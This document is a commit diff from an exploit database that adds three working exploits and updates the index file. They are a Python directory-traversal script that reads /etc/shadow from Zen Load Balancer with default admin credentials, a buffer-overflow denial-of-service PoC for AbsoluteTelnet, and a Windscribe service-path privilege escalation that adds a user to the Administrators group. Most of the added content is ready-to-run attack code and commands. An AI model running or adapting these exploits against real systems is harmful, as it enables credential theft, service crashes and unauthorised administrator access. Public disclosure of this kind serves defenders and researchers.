DB: 2020-04-11

3 changes to exploits/shellcodes AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC) Windscribe 1.83 - 'WindscribeService' Unquoted Service Path Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
2020-04-11 05:01:50 +00:00 · 2020-04-11 05:01:50 +00:00 · 4ee0ce31e7
commit 4ee0ce31e7
parent 0f8df71e72
4 changed files with 108 additions and 0 deletions
--- a/exploits/cgi/webapps/48308.py
+++ b/exploits/cgi/webapps/48308.py
@ -0,0 +1,31 @@
 # Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
 # Date: 2020-04-10
 # Exploit Author: Basim Alabdullah
 # Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
 # Version: 3.10.1
 # Tested on: Debian8u2
 #
 # Technical Details:
 # The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
 # The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
 # Note that disclosure of the shadow file may allow an attacker to discover users' passwords
 #
 # Impact:
 # --------
 # Successful exploitation could allow an attacker to obtain sensitive
 # information.
 import requests
 import sys
 if len(sys.argv) <2:
    print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
    sys.exit(-1)
 else:
    files=sys.argv[2]
    url=sys.argv[1]    
    with requests.session() as s:
        urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs"
        response = s.get(urlz, auth=('admin', 'admin'), verify=False)
        txt=response.text
        print(response.text)
--- a/exploits/windows/dos/48305.py
+++ b/exploits/windows/dos/48305.py
@ -0,0 +1,22 @@
 # Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)
 # Discovery by: chuyreds
 # Discovery Date: 2020-05-02
 # Vendor Homepage: https://www.celestialsoftware.net/
 # Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
 # Tested Version: 11.12
 # Vulnerability Type: Denial of Service (DoS) Local
 # Tested on OS: Windows 10 Pro x64 es
 # Steps to produce the crash:
 # 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py
 # 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard
 # 3.- Open AbsoluteTelnet
 # 4.- Select "new connection file", "Connection", "SSH1", "Use last username"
 # 5.- In "username" field paste Clipboard
 # 6.- Select "OK"
 # 7.- Crashed
 buffer = "\x41" * 1000
 f = open ("absolutetelnet_username_SSH1.txt", "w")
 f.write(buffer)
 f.close()
--- a/exploits/windows/local/48306.txt
+++ b/exploits/windows/local/48306.txt
@ -0,0 +1,52 @@
 # Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
 # Date: 2020-04-10
 # Exploit Author: MgThuraMoeMyint
 # Vendor Homepage: https://windscribe.com
 # Version: v1.83 Build 20
 # Tested on: Windows 10, version 1909
 In windscribe v1.83 , there is a service via windscribe that every
 authenticated user can modify.
 C:\Users\mgthura>sc qc WindscribeService
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: WindscribeService
 TYPE : 10 WIN32_OWN_PROCESS
 START_TYPE : 2 AUTO_START
 ERROR_CONTROL : 1 NORMAL
 BINARY_PATH_NAME : C:\Program Files (x86)\Windscribe\WindscribeService.exe
 LOAD_ORDER_GROUP :
 TAG : 0
 DISPLAY_NAME : WindscribeService
 DEPENDENCIES :
 SERVICE_START_NAME : LocalSystem
 That shows that running as Local System this means that the
 BINARY_PATH_NAME parameter can be modified to execute any command on
 the system.
 I'll change binary_path_name with a command that add a user to
 administrators group , so it will be
 C:\Users\mgthura>sc config WindscribeService binPath= "net localgroup
 administrators pentest /add"
 [SC] ChangeServiceConfig SUCCESS
 C:\Users\mgthura>sc stop WindscribeService
 SERVICE_NAME: WindscribeService
 TYPE : 10 WIN32_OWN_PROCESS
 STATE : 3 STOP_PENDING
 (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
 WIN32_EXIT_CODE : 0 (0x0)
 SERVICE_EXIT_CODE : 0 (0x0)
 CHECKPOINT : 0x4
 WAIT_HINT : 0x0
 C:\Users\mgthura>sc start WindscribeService
 [SC] StartService FAILED 1053:
 The service did not respond to the start or control request in a timely fashion.
 Restarting service will cause the service to fail as the binary path
 would not point into the actual executable of the service.
 However the command will be executed successfully and the user will be
 added to the local administrators group.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6702,6 +6702,7 @@ id,file,description,date,author,type,platform,port
 48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
 48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux,
 48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows,
 48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -11024,6 +11025,7 @@ id,file,description,date,author,type,platform,port
 48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows,
 48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows,
 48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
 48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42547,3 +42549,4 @@ id,file,description,date,author,type,platform,port
 48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd,
 48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php,
 48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware,
 48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,